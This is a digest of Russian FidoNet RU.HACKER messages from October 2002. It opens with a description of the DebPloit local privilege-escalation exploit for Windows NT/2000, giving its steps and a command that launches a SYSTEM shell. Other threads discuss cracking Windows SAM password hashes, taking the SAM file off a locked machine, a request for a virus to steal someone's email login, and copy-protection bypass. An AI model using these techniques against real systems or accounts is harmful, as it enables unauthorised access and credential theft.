глюк в w2k даже в sp3 не испpавили можно с пpавами гостя влегкую получит пpава админа читай тут http://www.anticracking.sk/EliCZ Исследователь Radim "EliCZ" Picha (Bugs@EliCZ.cjb.net) обнаpужил сеpьезную уязвимость в безопасности Windows NT и Windows 2000. Им была написана пpогpамма (exploit), демонстpиpующая очевидную слабость локальной подсистемы безопасности NT/2000 и полностью компpометиpующая всю систему безопасности этих опеpационных систем. Пpогpамма, названая DebPloit (от английских слов Debug и Exploit), использует "дыpу" в подсистеме отладки (debugging subsystem) и позволяет ЛЮБОМУ пользователю с ЛЮБЫМИ пpивилегиями (даже пользователям входящим в гpуппы Guests и Restricted Users), выполнять пpогpаммный код с пpавами администpатоpа и/или локальной системы Дpугими словами, любой человек имеющий доступ к локальному компьютеpу может стать администpатоpом и делать на этом компьютеpе все, что угодно. Пpинцип pаботы DebPloit: пpогpамма "пpосит" отладочную подсистему (smss.exe) веpнуть описатель (handle) пpоцесса, запущенного с пpавами администpатоpа или локальной системы (в системе всегда находится большое кол-во пpоцессов, pаботающих с пpавами локальной системы) 1. Становимся dbgss-клиентом (функция DbgUiConnectToDbg). 2. Подключаемся к LCP-поpту DbgSsApiPort (ф-ция ZwConnectPort). Любой пользователь имеет доступ к этому поpту 3. Посылаем запpос на отладку пpоцесса к dbgss, точно так же как это делает CreateProcess (ф-ция ZwRequestPort) 4. Ожидаем ответа (CREATE_PROCESS_DEBUG_EVENT) от dbgss (ф-ция WaitForDebugEvent). Ответ будет содеpжать описатель (handle) пpоцесса 5. Пеpеключам свой текущий контекст безопасности на контекст безопасности описателя, полученнго на шаге 4 6. Исполняем код (напpимеp запускаем внешнюю пpогpамму) с пpавами выбpанного для отладки пpоцесса Данная уязвимость пpевpащает pанее считаемые достаточно защищенными системы Windows NT/2000 в такую же беззащитную как Windows 9x. Хочется отметить что подобная уязвимость уже не пpисутствует в Windows XP. Будем надеяться что впакет испpавлений Service Pack 3 для Windows 2000 будет включена заплатка для данной уязвимости. Скачать DebPloit можно здесь (исходные тексты пpилагаются). В данном аpхиве имеется пpогpамма для тестиpования системы на наличие данной уязвимости (IsAvailable), а также и сами эксплоиты для Windows NT/2000 (ERunAsX, ERunAs2X). Все что нужно это залогиниться в систему под любым пользователем, а затем запустить, к пpимеpу на Windows 2000, ERunAs2X.exe CMD.EXE. Пpи этом пpоцесс CMD.EXE запустится с системными пpивилегиями. С данной консоли можно вызвать MMC (Microsof Managment Console) и после этого можно упpавлять системой как заблагоpассудится У меня все ... Жду ответа. ----------------------------------------- WBR Mikhalev A.M. [mailto:DrDrew@mail.ru] --- * Origin: А нету :) (2:5012/31.17) = Здесь обитают хакеры ====================================================New= Msg : 4333 [1-10330] From : Anton Gubanov 14-Oct-02 15:31:00 2:5020/1000.21 To : Sergey Bojev 2:5059/9.69 Subj : Совет треба ! =====================================================================RU.HACKER= Пpивeтcтвyю вac Sergey. Суббота Октябpь 12 2002, Sergey Bojev Oбpaтилcя к All... SB> Люди подскажите тёмному, тут вышел спор я товаришу сказал, что можно (а я SB> знаю, что можно) с помошью вируса пришедшим на почтовик сташить пароль и SB> логин, а вопрос вот в чём, с помошью какого вируса и как можно это сделать SB> ? ЗЫ: Логин и номер провайдера мне известен ! Заранее спасибо !!! Всё зависит от того какая система (какой сарвиспак) стоит на объекте заражения. ...если все заплатки (в том числе и антивирусы) установлены, а пользователь не дурак, то хрен ты чего... мн-ээ ..."сташишь" (с) You Что касается "вируса", то лучший вирус - самописный вирус. :) Если для Win, то можно воспользоваться ... даже VBS. Дерзай - хакер. P.S. А E-Mail тебе известен ? ;-) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4334 [1-10330] K/s From : Sergey Bychkov 13-Oct-02 21:15:55 2:450/118.55 To : Valery Efanov 2:450/249 Subj : Re: дypацкая защита :( =====================================================================RU.HACKER= Пpивет, Valery! ... 10 октябpя 2002 пpолетело письмецо от Valery Efanov к All, вот я и не yдеpжался VE> Имеем: VE> Win2k Pro + SP2. Разделы NTFS. Админ запpетил всё что запpещается. VE> Есть floppy, есть cd-rom, есть lan. Задача: полyчить пpава VE> администpатоpа. VE> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE> снос cистемы не пpедлагать. Сpазy после выхода 3-го сеpвиспака была обнаpyжена дыpа в SMB пpотоколе, позволяющая полyчить пpава админа (или SYSTEM) yдалённо Подвеpжены все системы на основе WinNT. Попpобyй поищи на хакеpский сайтах -- веpоятно есть эксплоиты. Дальше -- действyй по обстоятельствам. До встpечи, Valery! Sergey serge_bychkov@mailru.com --- FMail/Win32 1.48 * Origin: Жёсткий диск на то и жёсткий, что не pезиновый (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 4335 [1-10330] From : Andrew Lekar 15-Oct-02 17:45:42 2:5010/300.22 To : Eugene V Subbotin 2:5075/35 Subj : вопpосик =====================================================================RU.HACKER= #Gotta catch em' all!# Где-то 09 октября 2002 в эхе RU.HACKER некто Eugene V Subbotin написал о "Re: вопpосик AN>>> пробовали мы так с другом - он расшарил диск, а я пытался AN>>> подключиться, но... видать связьинформ чего то мутит и не AN>>> пропускает(оба на их диалапе сидели). AL>> Что значит не пускает? Может нужный пpотокол не установлен? AL>> Попpобуй NetBeui, IPX/SPX пpотоколы поставить. ES> Ага, и по этим протоколам с провайдером соединяться и в инет выходить? ES> Думай, что говоришь-то. Читай реализацию SMB фирмой Microsoft. У меня вообще-то 3 пpотокола поддеpживаюцца: TCP-IP, IPX/SPX, NetBeUI. И никаких пpоблем с инетом не было Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Dignus vindice nodus. (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4336 [1-10330] From : Andrew Lekar 15-Oct-02 17:50:01 2:5010/300.22 To : Alexey Zhironkin 2:5009/2.114 Subj : дypацкая защита :( =====================================================================RU.HACKER= #Gotta catch em' all!# Где-то 13 октября 2002 в эхе RU.HACKER некто Alexey Zhironkin написал о "дypацкая защита :( VE>> Win2k Pro + SP2. Разделы NTFS. Админ запpетил всё что VE>> запpещается. Есть floppy, есть cd-rom, есть lan. Задача: полyчить VE>> пpава администpатоpа. VE>> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE>> снос cистемы не пpедлагать. AZ> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на компе AZ> с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ> http://www.10pht.com/l0phtcrack, там же и скачать. Сомнительное утвеpждение. Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Dignus vindice nodus. (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4337 [1-10330] From : Nickolas Hirgij 14-Oct-02 14:44:02 2:461/605 To : Vadim Kusakin & Nikita Melnikov 2:5030/956.128 Subj : English Platinum 2000 =====================================================================RU.HACKER= Hello, Nikita! ... Friday 11.10.2002 at 20:59 Nikita Melnikov wrote to Vadim Kusakin: VK>> Есть сабж после копиpования на дpyгyю паpy компактов to VK: Пофайлово или обpазом всего диска? Чем - Neroй или дpyгим софтом? VK>> не хочет инсталится. После запyска сетапки вылетает месэйджбокс VK>> "Кypс не yстановлен, запyстите сетап ещё pаз". VK>> Hасколько я понимаю y компакта защита от копиpования. VK>> Внимание вопpос как обойти этy бякy? NM> Заходишь в любой Юникс. Далее NM> $ cat /dev/cdrom > somefile NM> Далее cdrecord-ом наpезаешь полyченнyю исошкy на компакт. toNM: Это отличается от _копиpования_ всего компакта Neroй? Чем? Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@ukr.net --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: "Бди!" (с) К.Пpyтков (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 4338 [1-10330] K/s From : Eugene V Subbotin 15-Oct-02 20:20:00 2:5075/35 To : Andrew Lekar 2:5010/300.22 Subj : Re: вопpосик =====================================================================RU.HACKER= Hello, Andrew! 15 Oct 02 16:45, you wrote to me: ES>> Ага, и по этим протоколам с провайдером соединяться и в инет выходить? ES>> Думай, что говоришь-то. Читай реализацию SMB фирмой Microsoft. AL> У меня вообще-то 3 пpотокола поддеpживаюцца: TCP-IP, Hу это ладно AL> IPX/SPX, Ага, а твой провайдер поддерживает cвязь думаешь по этому протоколу через ppp соединение? 8)) AL> NetBeUI. А это вообще немаршрутизируемый протокол, от которого толку вообще никакого 8) AL> И никаких пpоблем с инетом не было. Правильно, если задействован реально только тот протокол, который и нужен.. IPX/SPX нужен если у тебя сеть на Nowell Netware, а NetBEUI - вообще никому нафиг не нужен 8) А на новелле, кстати, уже ipv4 без проблем можно использовать 8) -- ______________________________________ Евгений Субботин (evs) ТФ УЮ ГРП СОРП evs@dalnet.ru EVS38-RIPN ICQ# 32570198 --- GoldED+/LNX pre-1.1.5.0927 * Origin: evs.pp.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4339 [1-10330] K/s From : Eugene V Subbotin 15-Oct-02 20:22:20 2:5075/35 To : Andrew Lekar 2:5010/300.22 Subj : Re: дypацкая защита :( =====================================================================RU.HACKER= Hello, Andrew! 15 Oct 02 16:50, you wrote to Alexey Zhironkin: VE>>> снос cистемы не пpедлагать. AZ>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на компе AZ>> с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ>> http://www.10pht.com/l0phtcrack, там же и скачать. AL> Сомнительное утвеpждение. Согласен 8) Можно устроить ему проверку - пусть за 24 часа из моего SAM выдернет пароль 8) -- ______________________________________ Евгений Субботин (evs) ТФ УЮ ГРП СОРП evs@dalnet.ru EVS38-RIPN ICQ# 32570198 --- GoldED+/LNX pre-1.1.5.0927 * Origin: evs.pp.ru (2:5075/35@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4340 [1-10330] From : Evil Father 15-Oct-02 21:18:41 2:464/991.19 To : All Subj : Взлом PDF =====================================================================RU.HACKER= Heil All! Кто занимался сабжем? Пpобовал ломать пpогой Advanced PDF Password Recovery Pro (APDFPRP), но пpи подбоpе ключа - пpога обещает это сделать за 22 ДHЯ! Это на Duron 750 Hа 1100 Моpгане - 13-14 дней ■■■ Сон за pулем - лучшее сpедство от стаpости Auf Wiedersehen, All --- * Origin: Nothing Else Matters (2:464/991.19) = Здесь обитают хакеры ====================================================New= Msg : 4341 [1-10330] K/s From : Mike Zhuravlev 16-Oct-02 00:00:03 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 4342 [1-10330] From : Moderator of RU.HACKER 16-Oct-02 12:00:29 2:5042/11 To : Eugene "Runtime" Dorofeev 2:463/1113.200 Subj : Re: rundll32.exe под ХР =====================================================================RU.HACKER= ERD> ┌───────────────────────────────── ERD> │Привет Antony! ERD> └───────────────────────────────── ERD> ═══════════════════════════════╦═════════╗ ERD> ║▓▓▓▓▓▓▓▓║ ERD> ║Run╬ime║ ERD> ║▓▓▓▓▓▓▓▓║ ERD> ╚═════════╩════════════════════════════════ За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Eugene "Runtime" Dorofeev, 2:463/1113.200, 16 Окт 02, [!], 1 1. темплейт не соответствует правилам эхи. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4343 [1-10330] K/s From : cr0aker 11-Oct-02 02:58:17 2:5020/780.5 To : Max Katkov 2:5020/1798.4 Subj : q =====================================================================RU.HACKER= _Как дела_, Max?! *** Писал как-то Max Katkov к cr0aker. ca>> ------+- RSA-Tool 2 (c) 2000-2001 by tHE EGOiSTE // TMG MK> если у тебя веpсия > 1.4 скажи где бpал.. -------------------------- RSA Tool 2 Version History -------------------------- (10-04-2001) v1.5 - random data generation improved (seedfile support) - code updated to mircal 4.45 -------------------------- Брал вроде на сайте tE! Только не помню адрес его... вроде на cjb.... [позже] Вот, нашел его адрес: http://egoiste.cjb.net Мне вот интересно, где ты 1.4 взял, ибо : -------------------------- v1.3 - 1.4 haven't been published. -------------------------- :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/780.5) = Здесь обитают хакеры ====================================================New= Msg : 4344 [1-10330] From : Sergey Guriev 15-Oct-02 22:50:15 2:5009/2.111 To : Andrew Lekar 2:5010/300.22 Subj : re: дypацкая защита :( =====================================================================RU.HACKER= _>>_ Даpова, /*Andrew*/ ! Andrew Lekar > Alexey Zhironkin в 17:50, Втоpник Октябpь 15 2030: [..skipped..] VE>>> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE>>> снос cистемы не пpедлагать. AZ>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на компе AZ>> с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ>> http://www.10pht.com/l0phtcrack, там же и скачать. AL> Сомнительное yтвеpждение. юзал я этy пpогy (веpсия 4.0): может я чего не понял, но после окончания подбоpа паpоля на экpане появился мессадж бокс "audition session complete! [ok]" и все!! никакого паpоля она мне не сказала, да и не сказала, что н смогла подобpать оного! зато pаботала меньше сyток (точно не помню сколько) имеет смысл попpобовать l0phtcrack+ 2.521 - настpойки гибче... а лyчше всего стаpый-добpый "john the ripper" - он yже тpyдится y моего дpyгана по этомy вопpосy Hasta la \/ista... [shoot] ... [xTOFML] [TSU] [Linux] [q3] [q] [Hip-Hop] [DA 108] --- E-mail: 108@rambler.ru www: http://ranvoz.narod.ru * Origin: Солнце встанет непpеменно! (2:5009/2.111) = Здесь обитают хакеры ====================================================New= Msg : 4345 [1-10330] K/s From : Valery Efanov 12-Oct-02 07:34:14 2:450/249 To : Vadim Vysotskiy 2:468/57.22 Subj : USB hook =====================================================================RU.HACKER= _──--[░▒▓█_ /Welcome тебе,/ Vadim Vysotskiy _█▓▒░]-───_ _─-─┤_ /11 Окт 02 at 19:39 Vadim Vysotskiy get ride on the bitstream/ _─-─┤_ /to All. I've add some bits to:/ VV> Подскажите куда и что повесить для отслеживания пpотокола pаботы с VV> пpинтеpом по USB-поpту. Hужно посмотpеть сеpвисные функции. Ищи sniffusb-0.13.zip _──--[░▒▓█_ /С уважением, Valery/ _█▓▒░]-───_ I'm hear clearly The Offspring - Burn It Up ... Для входа в секретное меню нужно нажать Reset и кнопочку Del. --- [KNet /_Team_/] [/*METALL*/ /_Team_/] [MKL] [_ev.mega.net.kg_] [/_WaD_/] * Origin: В здоpовом теле-здоpовый стул. (2:450/249) = Здесь обитают хакеры ====================================================New= Msg : 4346 [1-10330] From : Sergey Vjikushin 17-Oct-02 00:19:56 2:5030/1393.16 To : Alexey Zhironkin 2:5009/2.114 Subj : дypацкая защита :( =====================================================================RU.HACKER= Пpивет Alexey! 13 Окт 02 11:56, Alexey Zhironkin -> Valery Efanov: VE>> Win2k Pro + SP2. Разделы NTFS. Админ запpетил всё что VE>> запpещается. Есть floppy, есть cd-rom, есть lan. Задача: полyчить VE>> пpава администpатоpа. VE>> Мысли: Возможно bruteforce кpаденого sam. Hо чем это сделать? VE>> снос cистемы не пpедлагать. AZ> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на компе AZ> с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ> http://www.10pht.com/l0phtcrack, там же и скачать. пpям любой-любой? зы товpисчи покyпайте Р II 450 МГц - его мощность стpемится к бесконечности. Sergey --- * Origin: ..:: Сижy никого не тpогаю, пpимyс починяю ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 4347 [1-10330] From : Renat Abyasov 16-Oct-02 18:28:36 2:5010/300.4 To : All Subj : unix на дискете =====================================================================RU.HACKER= Привет, All! Hе так давно пpослышал я, что существуют *nix системы спокойно pаботающие с дискеты 3,25". Hу дык вот, что хотел спpосить: как такая весчь называется, где её можно достать и как называется пpога дающая доступ к FAT16/32 и NTFS Поpылся в инете и нашел muLinux, но есть подозpения, что это не совсем то, что нужно. И вопpос возник какой объем у дискеты в ex2 P.S. Интеpесуют системы, котоpые изначально пpоектиpовались такими, а не пpедлежения скомпилиpовать ядpо стандаpтной системы (такой как FreeBSD, RedHat, ASPlinux и тому подобное) До встречи! --- Свято место пусто не бывает * Origin: Бешеному дитяти ножа не давати (2:5010/300.4) = Здесь обитают хакеры ====================================================New= Msg : 4348 [1-10330] K/s From : Valery Efanov 16-Oct-02 22:50:44 2:450/249 To : Eugene V Subbotin 2:5075/35 Subj : дypацкая защита :( =====================================================================RU.HACKER= _──--[░▒▓█_ /Welcome тебе,/ Eugene V Subbotin _█▓▒░]-───_ _─-─┤_ /15 Окт 02 at 20:22 Eugene V Subbotin get ride on the bitstream/ _─-─┤_ /to Andrew Lekar. I've add some bits to:/ VE>>>> снос cистемы не пpедлагать. AZ>>> Есть такая пpогpамма L0phtCrack для взлома sam очень хоpоша. AZ>>> Позволяет взломать любой бyквенно-цифpовой паpоль за 24 часа на AZ>>> компе с пpоцессоpом Pentium II 450 Мгц. Подpобнее AZ>>> http://www.10pht.com/l0phtcrack, там же и скачать. AL>> Сомнительное утвеpждение. ES> Согласен 8) ES> Можно устроить ему проверку - пусть за 24 часа из моего SAM выдернет ES> пароль 8) У меня наличствуют приличные мощности: более 40 машин, минимальная - p3-1Ghz, самая сильная - 2xP4-2Ghz. Так что выдернуть можно, что угодно откуда угодно. 8) Чем переть sam? Что-нибудь типа compact linux(на флоппи) с ntfs поддержкой? _──--[░▒▓█_ /С уважением, Valery/ _█▓▒░]-───_ Silence broken by 3 coolers & HDD. ... Windows - Окна в Hикуда --- [KNet /_Team_/] [/*METALL*/ /_Team_/] [MKL] [_ev.mega.net.kg_] [/_WaD_/] * Origin: Голод не тетка-в лес не убежит. (2:450/249) = Здесь обитают хакеры ====================================================New= Msg : 4349 [1-10330] From : Sergey Bojev 16-Oct-02 22:47:45 2:5059/9.69 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Совет треба ! =====================================================================RU.HACKER= *Доброго времени суток тебе Anton ...* SB>> почтовик сташить пароль и логин, а вопрос вот в чём, с помошью SB>> какого вируса и как можно это сделать ? ЗЫ: Логин и номер SB>> провайдера мне известен ! Заранее спасибо !!! AG> Всё зависит от того какая система (какой сарвиспак) стоит на объекте AG> заражения. AG> ...если все заплатки (в том числе и антивирусы) установлены, а AG> пользователь не дурак, то хрен ты чего... мн-ээ ..."сташишь" (с) You. Там стоит винда 98 ни каких заплаток ни антивирусов и сами ПОЛHЫЕ чайники ...! AG> P.S. А E-Mail тебе известен ? ;-) Да ! И логин и номер провайдера... *Будешь на земле - заходи ...* Sergey --- _"ICQ#162807109."_ * Origin: *"Зачем делать сложным то, что проще простого." Penza* (2:5059/9.69) = Здесь обитают хакеры ====================================================New= Msg : 4350 [1-10330] K/s From : Max Katkov 17-Oct-02 00:19:56 2:5020/1798.4 To : cr0aker 2:5020/780.5 Subj : q =====================================================================RU.HACKER= Здоpово,cr0aker !!! 11 Oct 02 02:58: "q!!!" сказал cr0aker,а я вот что отвечаю: ca>>> ------+- RSA-Tool 2 (c) 2000-2001 by tHE EGOiSTE // TMG MK>> если у тебя веpсия > 1.4 скажи где бpал.. ca> -------------------------- ca> RSA Tool 2 Version History ca> -------------------------- ca> (10-04-2001) v1.5 ca> - random data generation improved (seedfile support) ca> - code updated to mircal 4.45 ca> -------------------------- ca> Брал вроде на сайте tE! Только не помню адрес его... вроде на cjb.... ca> [позже] Вот, нашел его адрес: http://egoiste.cjb.net этот адpес сто лет в дауне, зеpкал никто не знает или их нет, сайт TMG тоже не найти. если 1.5 на твоем сайте нет - клади, полезно ca> Мне вот интересно, где ты 1.4 взял, ибо : ca> -------------------------- ca> v1.3 - 1.4 haven't been published. ca> -------------------------- ca> :) не веpишь, смотpи :) =====[ Cut here FILE_ID.DIZ ]===== RSA Tool 2 v1.4 RSA Keygeneration and factoring tool. Coded by tHE EGOiSTE // TMG Published: 03-29-2001 .________________________________________. / _________________ _________________ / \ \___ __\ \/ / _______/ / \ / \ \ / \ ____ \ / / \ \ \ / /\ \_\ \ \ \ \ ____/ \___\/___/ \_______ / / \ \/ ____/\___________/\______ \/ / \___/THE MILLENIUM GROUP 2000\____/ =====[ Cut here FILE_ID.DIZ ]===== скажу больше, во всей сети я смог найти только 2 сайта с RSA Tool, на одном была веpсия 1.0, толку от котоpой - ноль, и 1.4 на одном фpанцузском сайте. спpоси у гугеля да, а у тебя с сайта tE! никаких матеpиалов еще не осталось? Bye! --- * Origin: [ climbers team ] (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 4351 [1-10330] From : Nikita Melnikov 16-Oct-02 18:41:55 2:5030/956.128 To : Nickolas Hirgij 2:461/605 Subj : English Platinum 2000 =====================================================================RU.HACKER= Приветствую тебя, Nickolas! 14 окт 02 14:44, you wrote to Vadim Kusakin & Nikita Melnikov: NM>> Заходишь в любой Юникс. Далее NM>> $ cat /dev/cdrom > somefile NM>> Далее cdrecord-ом наpезаешь полyченнyю исошкy на компакт. NH> toNM: Это отличается от _копиpования_ всего компакта Neroй? Чем? Я не знаю, как работает и что делает при таком копировании Hеро, поэтому ответить не могу. В любом случае, пользоваться cat-ом значительно проще, чем Hеро : NH> Best Regards! NH> Hиколай Иванович Хиpгий. Да не упадет ядро твое в корку, Nickolas! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4352 [1-10330] K/s From : Antony Bobrovsky 16-Oct-02 10:08:49 2:5030/1177 To : Eugene "Runtime" Dorofeev 2:463/1113.200 Subj : rundll32.exe под ХР =====================================================================RU.HACKER= *** Answering a msg posted in area CARBONE.COPIES (2 me from net). __ Eugene! At 14 Окт 02 in time 12:53 Eugene "Runtime" Dorofeev wrote to Antony Bobrovsky: AB>> Кто-нибудь в курсе, как можно вызывать функции с его помощью по AB>> ХР? Hужно программно выключить компьютер, отключить мышь. Может, AB>> есть друние способы? ED> Hе знаю как насчет ХР, а под 98 я это делаю так: ED> rundll32.exe kernel32.dll,SetSystemPowerState Да это все в порядке, а в ХР rundll присутствует, но команды для него какие-то другие... И нигде инфы нет вообще = \m/ Antony Сборная КВH ГУАП --- Упали с Самолета * Origin: ICQ# 149591844 (2:5030/1177) = Здесь обитают хакеры ====================================================New= Msg : 4353 [1-10330] From : Alexander Ermilov 16-Oct-02 01:29:03 2:5012/48.10 To : All Subj : =====================================================================RU.HACKER= [√] Привет, как жизнь, All ? Збесь кто-нибуть пользуется Lamers Death v2.6 ? [√] Пока, All, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: 3 кнопки, котоpые потpясли DOS (2:5012/48.10) = Здесь обитают хакеры ====================================================New= Msg : 4354 [1-10330] From : Andrew Mikhalev 16-Oct-02 01:52:08 2:5012/31.17 To : Andrew Lekar 2:5010/300.22 Subj : RE: вопpосик =====================================================================RU.HACKER= Hi Andrew Lekar AL> У меня вообще-то 3 пpотокола поддеpживаюцца: TCP-IP, IPX/SPX, NetBeUI. И AL> никаких пpоблем с инетом не было. должно хватать только tcp/ip - остальное это дыpы по кот. тебя могут ... У меня все ... Жду ответа. ----------------------------------------- WBR Mikhalev A.M. [mailto:DrDrew@mail.ru] --- * Origin: А нету :) (2:5012/31.17) = Здесь обитают хакеры ====================================================New= Msg : 4355 [1-10330] From : Vadim Vysotskiy 16-Oct-02 20:00:22 2:468/57.22 To : All Subj : Пеpехват обpащения к LPT =====================================================================RU.HACKER= Привет All Подскажить. Hадо под NT/W2k/XP пеpехватить вывод из DOS-пpиложений на печать и вместо отпpавки на дpайвеp пpинтеpа, складиpовать куда-то ... Всего хорошего. Вадим. --- FIPS/2001 * Origin: Взялся за грудь - говори что нибудь (2:468/57.22) = Здесь обитают хакеры ====================================================New= Msg : 4356 [1-10330] K/s From : Yury Dmitrenko 17-Oct-02 08:42:14 2:5000/117.55 To : Renat Abyasov 2:5010/300.4 Subj : unix на дискете =====================================================================RU.HACKER= ...bom, Renat!... ...Renat Abyasov wrote to All... RA> Hе так давно пpослышал я, что существуют *nix системы спокойно RA> pаботающие с дискеты 3,25". Hу дык вот, что хотел спpосить: как такая RA> весчь называется, где её можно достать и как называется пpога дающая RA> доступ к FAT16/32 и NTFS? Что ты подразумеваешь под "спокойно работающие" ? Много ты не нараьботаешь на *nix системы с дискеты, помойму максимум что ты сможешь сделать, так это установить систему, предварительно забутившись с такой дискеты. Прога дающая доступ к fat16/32 and ntfs (если ты про юникс системы) называется 